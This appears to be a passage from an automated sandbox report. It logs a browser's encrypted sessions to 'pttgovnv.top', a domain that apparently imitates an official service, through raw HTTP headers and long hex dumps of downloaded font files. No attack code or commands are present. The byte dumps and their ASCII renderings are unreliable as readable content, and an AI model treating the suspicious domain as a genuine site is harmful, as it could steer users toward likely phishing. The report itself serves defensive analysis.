          2024-09-01 22:25:23 UTC1369INData Raw: b1 0a 60 99 cb 2d e0 22 2e 84 a2 cf 30 88 3b 78 b8 b0 58 5a 9a 85 1c 9f 03 15 08 33 e3 5c b0 5f a9 40 b5 52 99 7e 2f 66 07 83 aa 0c b2 1f e8 fb 2e 19 6d 3a 94 91 b9 53 41 6a b0 38 12 7c 54 6a c8 c9 40 f5 d9 03 ac ac 54 b5 08 34 26 28 ec 50 40 34 44 9d 28 b7 9c c4 7b 8d 94 40 41 9c a9 b3 57 19 31 3b 49 03 b1 9e 3b 7a d3 9d f7 6e cb 6b 7a a6 49 bd 22 c5 52 f5 f4 82 87 23 d7 dc 38 77 f7 9b 2f 7e 79 98 f8 1f 0a 9b a4 41 9b b7 56 d7 54 ef 7f 35 da 75 d7 35 a3 b7 af 69 9c f3 ba 3a dd 92 b0 98 ae 73 0f e8 fd 43 25 0f e7 05 3a af 5b 31 22 32 ae 33 05 3d fb b8 ce 4c bc c8 a4 1e 56 82 8e d8 1c ba ce 24 17 d5 15 bc 89 2d e1 24 99 aa 7d 0e 38 64 01 d4 08 bd 48 5d 60 41 e1 74 45 b5 51 e7 45 26 ba 01 cc 0e b7 47 62 ee 30 64 44 89 84 9a fc 99 5f 30 bf 20 60 76 33 26 05
          Data Ascii: `-".0;xXZ3\_@R~/f.m:SAj8|Tj@T4&(P@4D({@AW1;I;znkzI"R#8w/~yAVT5u5i:sC%:[1"23=LV$-$}8dH]`AtEQE&Gb0dD_0 `v3&
          2024-09-01 22:25:23 UTC1369INData Raw: db 1b e1 24 ec 8d 03 63 41 0c 4d 57 6a 5b 3b 2e 1a 0f aa b1 66 20 e4 9c 2a 51 f8 1b 66 15 05 04 43 dd 9a b5 67 a2 d9 c4 17 2e d2 aa c9 7b 0b b5 89 11 c9 d3 fa ab 76 8c 6f d0 ba 47 d7 f1 79 db b4 1b 19 bd 80 7b 92 14 b8 a7 c0 a5 b3 7b c6 cc 79 b0 60 7c b5 99 f3 f6 4c 94 3c 7f 9c 66 bf 91 1a e1 ec e6 60 ac 06 95 1b 95 54 b4 5b c1 4c 23 66 24 32 8e 10 72 d6 70 12 28 89 01 3a 58 0e 0c c4 c3 51 cc 61 31 84 a9 0e 2a 48 a0 7e ae c0 37 b9 e8 1f c8 41 43 8d 19 8e 55 2a 70 56 74 0b b8 d0 4f 0a fc 95 43 43 84 68 b5 19 ec d5 47 31 cc a7 3b d5 95 18 a2 05 68 94 20 20 5c 95 57 ea ba 63 12 21 57 88 c5 4d 73 23 91 86 1b 6e 7e fc e1 c9 ad 4f 6d 11 cb 37 8e 1c 73 68 dc a4 17 8f 02 f2 bd f9 d0 fa 7d af 82 ee fe 35 71 bf fe 11 45 42 fd 6c c0 ba 5c 68 31 89 59 1a 70 55 b8 09
          Data Ascii: $cAMWj[;.f *QfCg.{voGy{{y`|L<f`T[L#f$2rp(:XQa1*H~7ACU*pVtOCChG1;h \Wc!WMs#n~Om7sh}5qEBl\h1YpU
          2024-09-01 22:25:23 UTC1369INData Raw: 3c 14 47 92 31 da c8 89 52 97 5b 44 ca 1a 56 68 20 a7 25 0e 5f 52 8a 58 d4 29 87 21 2e 62 72 29 35 69 b9 5d fa a2 31 22 be 00 29 43 3f be a4 f1 ab 6b d2 a5 8b ae fe aa 51 4b e9 33 62 fa d0 d2 81 bd 2f 0d 55 96 5f 69 87 25 6f d5 be 6e b8 85 70 fc d8 73 ca 03 33 7a 79 6b e4 ee 93 3f f2 33 db 97 50 07 f3 88 b3 7d a1 5f 98 67 84 ec 7f b3 7d f1 cb a3 3b f9 0f a2 0b f9 d5 e5 c2 13 b5 e5 ad b5 b5 b1 b8 74 7e b5 69 0f 9c 82 5a 8e 66 18 a1 6a 1e 4e 2e 42 26 49 a3 8a 50 75 c1 dc 95 e3 e8 85 45 09 3b 21 18 f1 a4 51 b2 91 6c a5 8a 71 16 5d 38 b0 42 d5 9d 06 b2 10 51 68 a8 64 d8 02 52 b7 9d 1e d0 e2 7e a4 58 91 f3 40 69 f4 2a 7a cc 04 9c 58 9f 17 49 47 cf b2 eb 67 90 a9 ab 6e a8 6d 98 30 66 e1 da c3 8f f1 f2 08 be 61 22 a9 27 85 52 9d 69 da 54 ed e8 ad 37 7b 2d 9e a5
          Data Ascii: <G1R[DVh %_RX)!.br)5i]1")C?kQK3b/U_i%onps3zyk?3P}_g};t~iZfjN.B&IPuE;!Qlq]8BQhdR~X@i*zXIGgnm0fa"'RiT7{-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          37192.168.2.449774172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC593OUTGET /help/assets/f18e42bakFGym.woff HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://pttgovnv.top/help/assets/2dd339f2kFGym.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: font/woff
          Content-Length: 333588
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"51714-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36231
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oJDKrCfQd6Ad0Dx78qJOBAin8q%2Bb253p4cs2PwBprVipNHgCsSKNh%2FX0vnWuR%2FWofXtF1Y7sDtYAlZIngnm7Fjl5EINBPXM4b68kn%2BEMRBOGg1SRPZKKutHOHs8YymI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad079aa34374-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC641INData Raw: 77 4f 46 46 00 01 00 00 00 05 17 14 00 0b 00 00 00 05 16 c8 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 01 08 00 00 00 60 00 00 00 60 0f 12 08 eb 63 6d 61 70 00 00 01 68 00 00 00 4c 00 00 00 4c 1a 55 d2 18 67 61 73 70 00 00 01 b4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 01 bc 00 04 e5 4c 00 04 e5 4c 7b 68 e8 26 68 65 61 64 00 04 e7 08 00 00 00 36 00 00 00 36 0a e0 a9 c8 68 68 65 61 00 04 e7 40 00 00 00 24 00 00 00 24 0d c4 0e 50 68 6d 74 78 00 04 e7 64 00 00 17 18 00 00 17 18 2b e5 61 90 6c 6f 63 61 00 04 fe 7c 00 00 17 1c 00 00 17 1c 0d b5 9f f4 6d 61 78 70 00 05 15 98 00 00 00 20 00 00 00 20 06 00 05 b6 6e 61 6d 65 00 05 15 b8 00 00 01 3c 00 00 01 3c ec ff 90 85 70 6f 73 74 00 05 16 f4 00 00 00
          Data Ascii: wOFFOS/2``cmaphLLUgaspglyfLL{h&head66hhea@$$Phmtxd+aloca|maxp name<<post
          2024-09-01 22:25:23 UTC1369INData Raw: 08 08 17 01 5c 17 08 08 17 fe a4 17 08 08 17 01 5c 17 08 08 17 02 00 ae 17 08 08 17 ae 1c 17 17 1c ae 18 07 07 18 ae 1c 17 17 1c 1c 17 17 1c 1c 17 17 1c ff 00 1c 17 17 1c 1c 17 17 1c 02 00 1c 17 17 1c 1c 17 17 1c 00 03 00 66 ff cd 03 9a 03 cd 00 12 00 17 00 1c 00 00 01 21 22 06 15 11 14 16 33 15 21 35 32 36 35 11 34 26 23 03 23 35 33 15 37 21 11 21 11 03 33 fd 9a 2a 3d 1e 16 02 cc 16 1e 3d 2a 66 cd cd 33 fe 00 02 00 03 cd 3c 2b fd 00 15 1e 66 66 1e 15 03 00 2b 3c fd 00 33 33 cd 01 99 fe 67 00 00 00 02 00 48 00 b7 03 cd 02 e3 00 0f 00 1f 00 00 01 05 30 06 15 14 16 31 05 16 36 35 11 34 26 07 21 05 30 06 15 14 16 31 05 16 36 35 11 34 26 07 03 98 fe 8f 0f 0f 01 71 15 20 20 15 fe 2f fe 8f 0e 0e 01 71 16 1f 1f 16 02 e3 fe 0d 0b 0b 0e fd 0f 13 1c 01 ec 1c 12 0e
          Data Ascii: \\f!"3!52654&##537!!3*==*f3<+ff+<33gH01654&!01654&q /q
          2024-09-01 22:25:23 UTC1369INData Raw: 30 13 0c 5b 07 0e 14 16 0a 1d 12 70 18 2b 14 01 02 01 01 26 3b 19 08 0f 05 18 15 0d 07 5e 0a 0f 2d 27 09 14 0b 47 12 22 10 1d 2d 0e 0f 0f 0f 0f 0e 2d 1d 1d 41 24 23 4e 2a 1c 34 19 77 00 00 03 00 14 ff e1 03 ec 03 b8 00 30 00 62 00 94 00 00 01 32 16 17 1e 01 17 1e 01 17 1e 01 15 14 06 07 0e 01 07 0e 01 07 0e 01 23 22 26 27 2e 01 27 2e 01 27 2e 01 35 34 36 37 3e 01 37 3e 01 37 3e 01 33 01 0e 01 15 14 16 17 1e 01 17 1e 01 17 1e 01 33 32 36 37 3e 01 37 3e 01 37 27 0e 01 07 15 23 35 2e 01 27 37 1e 01 33 32 36 35 34 26 2f 01 2e 01 2f 01 01 22 06 07 0e 01 07 0e 01 07 17 3e 01 37 35 33 15 1e 01 17 07 2e 01 23 22 06 15 14 16 1f 01 1e 01 1f 01 3e 01 35 34 26 27 2e 01 27 2e 01 27 2e 01 23 01 ff 34 5f 2c 2c 4f 24 23 36 12 12 12 12 12 11 35 23 25 51 2c 2c 5f 33 32 5d
          Data Ascii: 0[p+&;^-'G"--A$#N*4w0b2#"&'.'.'.5467>7>7>33267>7>7'#5.'732654&/./">753.#">54&'.'.'.#4_,,O$#65#%Q,,_32]
          2024-09-01 22:25:23 UTC1369INData Raw: 01 37 3e 01 37 3e 01 35 34 26 27 2e 01 27 2e 01 27 2e 01 23 17 32 16 17 1e 01 17 1e 01 17 1e 01 15 14 06 07 0e 01 07 0e 01 07 0e 01 23 22 26 27 2e 01 27 2e 01 27 2e 01 35 34 36 37 3e 01 37 3e 01 37 3e 01 33 13 23 35 34 26 23 21 2a 01 23 0e 01 15 11 14 16 3b 01 15 14 16 33 21 32 36 35 11 34 26 23 05 11 33 15 23 2a 01 23 0e 01 1d 01 23 25 11 23 11 33 01 ff 33 5e 2b 2b 4f 23 25 36 12 12 13 13 12 12 36 25 24 4f 2c 2b 5d 32 33 5f 2c 2c 51 25 23 35 11 12 12 12 12 12 36 23 24 4f 2c 2c 5f 34 02 29 4e 23 24 41 1d 1d 2d 0e 0f 0f 0f 0e 0e 2c 1d 1e 42 24 24 4d 29 2a 4c 24 23 42 1e 1d 2d 0f 0f 0f 0f 0f 0f 2d 1f 1d 40 23 24 4d 2a c8 6b 10 0b fe f4 01 01 01 0a 0e 0f 0c 6b 10 0b 01 0c 0b 10 10 0b fe 88 d7 6b 01 01 01 0a 0e 51 01 5d d6 d6 03 b8 11 12 12 36 23 25 51 2b 2c
          Data Ascii: 7>7>54&'.'.'.#2#"&'.'.'.5467>7>7>3#54&#!*#;3!2654&#3#*##%#33^++O#%66%$O,+]23_,,Q%#56#$O,,_4)N#$A-,B$$M)*L$#B--@#$M*kkkQ]6#%Q+,
          2024-09-01 22:25:23 UTC1369INData Raw: 34 03 33 1e 15 fd 9a 16 1e 1e 16 02 66 15 1e fd 9a 02 00 fe 00 00 00 00 00 02 00 00 ff cd 03 df 03 c7 00 40 00 4d 00 00 05 34 26 27 2e 01 27 2e 01 27 2e 01 35 34 36 37 36 16 37 34 26 31 30 36 37 36 26 27 2e 01 37 26 06 07 0e 01 17 1e 01 31 30 06 15 16 36 17 1e 01 15 14 06 07 0e 01 07 0e 01 17 14 06 31 21 30 34 35 11 27 07 17 07 17 37 17 37 27 37 27 07 03 33 27 1f 1f 4f 29 29 37 11 11 0e 25 0b 05 20 04 10 09 02 03 2f 4a 0c 03 27 56 46 2e 27 1a 01 03 09 10 04 20 05 0b 25 26 52 29 37 10 11 0e 01 01 03 33 76 36 7b 7b 37 75 76 36 7b 7b 36 76 07 2c 42 1a 1a 29 12 11 22 14 14 30 20 26 13 46 1d 07 42 1a 12 3e 1e 1f 6b 14 0d 27 15 04 46 21 1d 4f 18 1e 3e 12 1a 42 06 1c 46 13 26 40 3d 23 12 2e 1d 1c 46 29 18 14 14 18 01 d2 7b 37 75 76 36 7a 7a 36 76 75 37 7b 00 00
          Data Ascii: 43f@M4&'.'.'.5467674&10676&'.7&1061!045'77'7'3'O))7% /J'VF.' %&R)73v6{{7uv6{{6v,B)"0 &FB>k'F!O>BF&@=#.F){7uv6zz6vu7{
          2024-09-01 22:25:23 UTC1369INData Raw: 4d 4d 43 43 b3 66 66 b3 42 43 4d fc 90 3d 35 34 8e 51 50 8e 35 35 3d 3d 35 35 8e 50 51 8e 34 35 3d 01 eb cd 80 e7 e6 80 00 00 00 00 03 00 14 ff e1 03 ec 03 b8 00 18 00 31 00 39 00 00 01 22 06 07 0e 01 15 14 16 17 1e 01 33 32 36 37 3e 01 35 34 26 27 2e 01 23 11 22 26 27 2e 01 35 34 36 37 3e 01 33 32 16 17 1e 01 15 14 06 07 0e 01 23 11 17 23 15 23 35 23 37 02 00 66 b3 43 42 4e 4e 42 43 b3 66 66 b3 43 42 4e 4e 42 43 b3 66 51 8d 35 35 3d 3d 35 35 8d 51 51 8d 35 35 3d 3d 35 35 8d 51 e6 80 cc 80 e6 03 b8 4d 43 42 b3 66 66 b3 43 43 4d 4d 43 43 b3 66 66 b3 42 43 4d fc 90 3d 35 34 8e 51 50 8e 35 35 3d 3d 35 35 8e 50 51 8e 34 35 3d 02 6b e6 cd cd e6 00 00 00 00 01 01 33 00 00 02 cd 03 9a 00 0b 00 00 01 11 27 07 11 34 36 33 21 32 16 15 02 cd cd cd 23 10 01 34 1a 19
          Data Ascii: MMCCffBCM=54QP55==55PQ45=19"3267>54&'.#"&'.5467>32###5#7fCBNNBCffCBNNBCfQ55==55QQ55==55QMCBffCCMMCCffBCM=54QP55==55PQ45=k3'463!2#4
          2024-09-01 22:25:23 UTC1369INData Raw: 08 46 2b 2b 4d 08 0f 02 11 01 4f 11 01 12 c0 c0 12 01 11 11 32 10 08 4a 29 29 42 09 09 09 09 42 29 29 4a 08 10 32 11 00 00 00 00 03 00 14 ff e1 03 ec 03 b8 00 13 00 2c 00 45 00 00 01 07 27 26 22 07 06 14 1f 01 16 32 3f 01 36 34 27 26 22 07 03 22 06 07 0e 01 15 14 16 17 1e 01 33 32 36 37 3e 01 35 34 26 27 2e 01 23 11 22 26 27 2e 01 35 34 36 37 3e 01 33 32 16 17 1e 01 15 14 06 07 0e 01 23 02 80 80 80 08 15 08 08 08 93 07 16 07 93 08 08 08 15 08 80 66 b3 43 42 4e 4e 42 43 b3 66 66 b3 43 42 4e 4e 42 43 b3 66 59 9b 3a 3b 43 43 3b 3a 9b 59 59 9b 3a 3a 44 44 3a 3a 9b 59 02 0f 75 75 08 08 07 15 08 90 07 07 90 08 15 07 08 08 01 a9 4d 43 42 b3 66 66 b3 43 42 4e 4e 42 43 b3 66 66 b3 42 43 4d fc 69 43 3a 3a 9c 59 58 9c 3a 3a 44 44 3a 3a 9c 58 59 9c 3a 3a 43 00 00 00
          Data Ascii: F++MO2J))BB))J2,E'&"2?64'&""3267>54&'.#"&'.5467>32#fCBNNBCffCBNNBCfY:;CC;:YY::DD::YuuMCBffCBNNBCffBCMiC::YX::DD::XY::C
          2024-09-01 22:25:23 UTC1369INData Raw: 16 3b 01 32 36 35 11 34 26 23 21 23 22 06 15 11 14 16 3b 01 32 36 35 11 34 26 23 03 00 66 16 1e 1e 16 66 15 1e 1e 15 fe 66 66 15 1e 1e 15 66 16 1e 1e 16 03 33 09 16 fd 71 15 0a 0a 15 02 8f 16 09 09 16 fd 71 15 0a 0a 15 02 8f 16 09 00 01 01 00 00 a3 03 00 02 f7 00 0f 00 00 01 14 06 31 01 06 26 35 11 34 36 17 01 30 16 15 03 00 10 fe 4a 18 22 22 18 01 b6 10 01 cd 0c 0f fe f1 10 14 1e 02 0f 1e 14 0f fe f0 0f 0b 00 01 00 9a 00 66 03 66 03 33 00 18 00 00 01 22 06 07 0e 01 15 14 16 17 1e 01 33 32 36 37 3e 01 35 34 26 27 2e 01 23 02 00 4a 83 30 31 38 38 31 30 83 4a 4a 83 30 31 38 38 31 30 83 4a 03 33 38 31 30 83 4a 4a 83 31 30 39 39 30 31 83 4a 4a 83 30 31 38 00 00 01 00 cd 00 9a 03 33 03 00 00 10 00 00 01 11 14 06 23 21 22 26 35 11 34 36 33 21 32 16 15 03 33 24
          Data Ascii: ;2654&#!#";2654&#fffff3qq1&5460J""ff3"3267>54&'.#J018810JJ018810J3810JJ109901JJ0183#!"&5463!23$
          2024-09-01 22:25:23 UTC1369INData Raw: 35 34 36 33 32 16 15 14 06 23 01 22 26 35 34 36 33 32 16 15 14 06 23 03 48 48 33 33 48 27 20 02 18 16 15 3e 28 21 47 20 20 28 48 33 33 48 28 20 20 28 48 33 33 48 27 20 02 18 16 15 3e 28 27 53 22 22 2e 02 1f 29 fd eb 1e 29 29 1e 1d 2a 2a 1d 1d 2a 2a 1d 1e 29 29 1e 01 9a 1e 29 29 1e 1d 2a 2a 1d 03 00 33 48 48 33 25 3b 0f 1e 2b 11 10 1b 0f 0d 1d 15 d3 0e 3c 25 33 48 48 33 25 3c 0e fe 78 0f 3b 25 33 48 48 33 25 3b 0f 1e 2b 10 11 1b 0f 0e 24 1c 1b 50 3a 0f 3c 25 47 2a 1d 1d 2a 2a 1d 1d 2a fd 0c 29 1e 1d 2a 2a 1d 1e 29 02 66 2a 1d 1d 2a 2a 1d 1d 2a 00 00 04 00 b8 ff ec 03 48 03 ae 00 3a 00 47 00 54 00 61 00 00 25 22 06 07 23 22 26 3d 01 1e 01 3b 01 1e 01 33 32 36 35 34 26 23 22 06 07 23 22 26 3d 01 3e 01 35 34 26 23 22 06 15 14 16 17 11 14 16 17 1e 01 3b 01 1e
          Data Ascii: 54632#"&54632#HH33H' >(!G (H33H( (H33H' >('S"".)))****))))**3HH3%;+<%3HH3%<x;%3HH3%;+$P:<%G****)**)f****H:GTa%"#"&=;32654&#"#"&=>54&#";
          2024-09-01 22:25:23 UTC1369INData Raw: 1e 05 06 0b 6c 02 1a 11 fd 92 11 1a 02 13 04 1c 16 02 92 16 1c 04 13 01 9f 01 96 16 1b d0 d8 d8 d0 1b 16 fe 6a 1c 3b 1e b5 1c 26 26 1c b5 1e 3b 1c df 10 16 16 10 71 15 20 20 15 71 00 00 00 00 02 00 08 00 3f 03 f8 03 5f 00 10 00 26 00 00 01 16 32 37 01 36 26 27 25 26 22 07 05 0e 01 17 01 25 27 05 0e 01 23 22 26 27 25 07 0e 01 17 01 16 32 37 01 36 26 27 01 d9 12 2a 11 01 d2 09 02 0a fe 29 0e 20 0e fe 29 0a 02 09 01 d1 02 1c 7f fe db 12 29 16 16 29 12 fe db 7f 0a 02 09 01 d1 12 2a 11 01 d2 09 02 0a 01 7b 0c 0c 01 0e 07 15 05 b5 07 07 b5 05 15 07 fe f2 28 3f aa 0c 0c 0c 0c ab 40 05 15 07 fe bd 0c 0c 01 43 07 15 05 00 00 09 00 04 ff fd 03 fb 03 9a 00 0e 00 1d 00 2c 00 3b 00 4a 00 59 00 83 00 92 00 a1 00 00 01 17 3e 01 37 3e 01 37 27 0e 01 07 0e 01 07 1f 01 3e
          Data Ascii: lj;&&;q q?_&276&'%&"%'#"&'%276&'*) )))*{(?@C,;JY>7>7'>


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          38192.168.2.44977635.190.80.1443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC535OUTOPTIONS /report/v4?s=IZ%2BvZmJal%2Fiwbtd5ooJ2LwDJoBvEsV%2F18E9do5HzNHBoHTcAkMlvZZgRFYrRUq8a13PZOk2zOmlvM87fMHsK5jeiwwxP%2FD49sGVB9aBSVwze6%2BEa0yhJsn%2BVc2ki4VY%3D HTTP/1.1
          Host: a.nel.cloudflare.com
          Connection: keep-alive
          Origin: https://pttgovnv.top
          Access-Control-Request-Method: POST
          Access-Control-Request-Headers: content-type
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC336INHTTP/1.1 200 OK
          Content-Length: 0
          access-control-max-age: 86400
          access-control-allow-methods: POST, OPTIONS
          access-control-allow-origin: *
          access-control-allow-headers: content-length, content-type
          date: Sun, 01 Sep 2024 22:25:22 GMT
          Via: 1.1 google
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          39192.168.2.449779172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:22 UTC593OUTGET /help/assets/2e158738kFGym.woff HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: font
          Referer: https://pttgovnv.top/help/assets/2dd339f2kFGym.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: font/woff
          Content-Length: 63712
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"f8e0-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36231
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDSgFgTA92LqWfDXeBlpzjjT7%2BrQ7HKDYX4LLFodBk8l3eKfYNw9KaiVDxEzZLDq%2FrM2f0rOJB%2FW5q1mgd0uwuglEe0ndmpJ%2FphTQ7zBVPYPRONWIr4rcl%2F6FQDugUA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad079c3b729f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC641INData Raw: 77 4f 46 46 00 01 00 00 00 00 f8 e0 00 12 00 00 00 01 9f 0c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 94 00 00 00 1c 00 00 00 1c 5d c5 46 7e 47 44 45 46 00 00 01 b0 00 00 00 1e 00 00 00 20 03 de 00 03 47 50 4f 53 00 00 01 d0 00 00 00 20 00 00 00 20 6c 91 74 8f 47 53 55 42 00 00 01 f0 00 00 01 bf 00 00 02 8a 48 8f b8 db 4f 53 2f 32 00 00 03 b0 00 00 00 5f 00 00 00 60 a1 36 9e d6 63 6d 61 70 00 00 04 10 00 00 03 22 00 00 04 7e cd 2a 1c 8d 63 76 74 20 00 00 07 34 00 00 00 44 00 00 00 44 0b 07 0e 4a 66 70 67 6d 00 00 07 78 00 00 01 b1 00 00 02 65 0f b4 2f a7 67 61 73 70 00 00 09 2c 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 09 34 00 00 cf da 00 01 5a 1c 68 39 4b f8 68 65 61 64 00 00 d9 10 00 00 00
          Data Ascii: wOFFFFTM]F~GDEF GPOS ltGSUBHOS/2_`6cmap"~*cvt 4DDJfpgmxe/gasp,glyf4Zh9Khead
          2024-09-01 22:25:23 UTC1369INData Raw: 2b 57 5d 0c 56 b4 3d 74 43 e3 88 57 72 7d 14 3d ef 7c 1f 46 05 2f a0 2c 78 11 be af a3 77 4c c5 56 bf 88 c1 76 41 cb f4 d0 a7 36 73 d2 d6 5f d6 af c6 96 4f cf 61 a3 03 5d e8 46 2f 32 e8 c7 00 0a 18 46 31 d0 0e 05 3c 1a f0 87 80 3f 06 fc 2d e0 1f 01 37 02 3e 6c b1 4a 98 19 94 4a 49 af 18 42 7c cb 77 7c cf 6d ee 48 3c 84 41 7c c1 3e 0e f0 55 a2 bd 48 70 82 93 9c e2 34 67 38 cb bb bc c7 39 de e7 3c 17 b8 c8 07 7c c8 47 7c ca 67 7c ce 17 92 9b 40 0f 96 b1 82 c7 78 82 ef d2 fd 27 7e e1 37 1a ea ba aa a9 79 b5 ab f6 ac b2 35 61 35 ac 3f a2 0d 73 45 ea 2b c4 d1 69 ee 9c 82 cd 97 5c e3 3a 37 b8 c9 57 7c cd 37 dc e2 aa d9 5a 5c 1e 20 29 4a c5 3a eb b2 5b 9d bf 64 f6 95 d0 f6 d1 4d 5d 4b f2 b7 cc 3d c3 47 9e 8e 89 d2 d4 45 5c ac a4 ec f3 24 4e e1 b4 78 ce 48 a5 7f
          Data Ascii: +W]V=tCWr}=|F/,xwLVvA6s_Oa]F/2F1<?-7>lJJIB|w|mH<A|>UHp4g89<|G|g|@x'~7y5a5?sE+i\:7W|7Z\ )J:[dM]K=GE\$NxH
          2024-09-01 22:25:23 UTC1369INData Raw: da 45 80 07 d2 f5 8d 46 46 da c1 23 2d 36 33 7a e5 ba 7d bf 8f c1 66 34 e5 4e 1a 40 79 cf 5b ca 43 46 d3 4e a0 16 ed b9 7f 32 3f 83 e1 3e ff cb 3c 07 83 96 66 9a 9e 5a 67 21 3d 84 c0 7c 33 6e 69 f0 35 a3 59 77 fd 41 5f b1 3a 5c 0d 06 86 14 d3 54 dc f5 c7 54 ca ff 96 e6 5c 6d 19 b6 36 33 9a 77 70 21 22 3f 98 06 68 6a ad 8d 40 d3 9f 3a a4 7a 3e 8e 62 09 72 f9 6c ac 0d 26 a6 ac 3f c9 44 70 61 32 5d d5 54 2d 33 be 76 70 9f ec 2c 3a d8 a4 4a 73 e0 01 0e b0 55 9e 82 87 e3 a3 09 85 f4 2d 89 32 4b 43 84 83 d8 2a 31 42 c4 24 87 42 4e 39 77 b2 3f 29 50 3e 92 84 31 6f 92 d2 ce b8 61 ad 81 71 e4 35 30 a8 cd d3 1c be cc 66 53 db 5b 87 30 7e 11 47 f0 dd 2f c6 92 0e 3e b2 a1 36 46 84 d8 8e 58 0a 60 02 91 90 51 55 be a1 c6 73 2f 8b 01 b9 d4 fe 33 10 25 60 79 fa ed 5f 27
          Data Ascii: EFF#-63z}f4N@y[CFN2?><fZg!=|3ni5YwA_:\TT\m63wp!"?hj@:z>brl&?Dpa2]T-3vp,:JsU-2KC*1B$BN9w?)P>1oaq50fS[0~G/>6FX`QUs/3%`y_'
          2024-09-01 22:25:23 UTC1369INData Raw: b2 12 60 e5 2a eb 90 38 f2 15 6e 6f 38 24 39 82 b9 7a 17 09 9b c8 b5 df 20 b8 e0 bb 89 eb d7 ac de ba 79 dd f2 27 1e eb 7b fb ae 5d b7 f7 9d 2b 14 ad 6d fe 88 9c 5d bf 66 e5 93 9b d7 ad dc bc b4 6f 4d cd 80 01 35 35 7d 45 fe ab 6f 2f 9c fb 3a 7a e1 7c 7d 3d a9 21 03 77 5f ae 41 7a 46 0e 7c f5 ed 0f 9f 7f 15 bd f0 f9 f3 cf 3d fb c2 f3 cf 3c 43 71 64 ea 95 1f 75 a7 75 ef 71 d9 5c 21 57 ce cd e7 22 7e 84 57 26 c2 2b 68 8b 46 cc 08 aa b0 19 80 d2 81 02 25 27 25 da 60 c8 41 fa d6 c6 17 95 73 1c 4a 7b a4 68 70 69 73 28 6e 3c b5 80 1e 15 f0 de 1e d0 63 9f 59 c8 0c e6 3b 60 e9 b2 4d 92 f3 2a 65 b7 33 22 f9 d2 60 f9 b2 47 92 fd 00 9e 70 50 72 36 71 06 9b 2f 2d bf 1d 74 a3 50 a9 28 e6 cb e3 10 30 90 2e a4 22 cc 1b 48 b0 c0 4e e2 e0 a8 20 76 1e 31 a9 0b 61 70 99 ba
          Data Ascii: `*8no8$9z y'{]+m]foM55}Eo/:z|}=!w_AzF|=<Cqduuq\!W"~W&+hF%'%`AsJ{hpis(n<cY;`M*e3"`GpPr6q/-tP(0."HN v1ap
